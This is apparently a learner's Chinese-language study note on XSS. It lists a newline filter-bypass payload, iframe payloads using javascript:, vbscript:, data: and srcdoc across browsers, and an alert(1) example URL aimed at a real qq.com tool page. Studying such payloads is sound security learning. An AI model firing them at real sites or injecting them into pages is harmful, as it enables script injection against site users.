注释中巧用换行符
这种情况出现在代码中输入的东西在源码中一模一样的显示,但是这种情况出现的并不多
使用换行符绕过
payload为
FilterValueAnd=%0aalert(1)
反射型xss告一段落,总结:巧用换行符、宽字节、反斜杠
DOM型XSS
不同浏览器利用iframe
XSS可以利用不同浏览器的特性来进行弹窗
src 执行 javascript 代码
<iframe src="javascript:alert(1)"></iframe>
IE 下 vbscript 执行代码
<iframe src="vbscript:msgbox(1)"></iframe>
Chrome 下 data 协议执行代码
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
上面的变体
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
Chrome 下 srcdoc 属性
<iframe srcdoc="<script>alert(1)</script>"></iframe>
例如:
chrome 下,我们可以用 data 协议来执行 JS。
http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,<script>alert(1)</script>'&gid=yl&cid=68&from=
明天要把这本书看完,冲鸭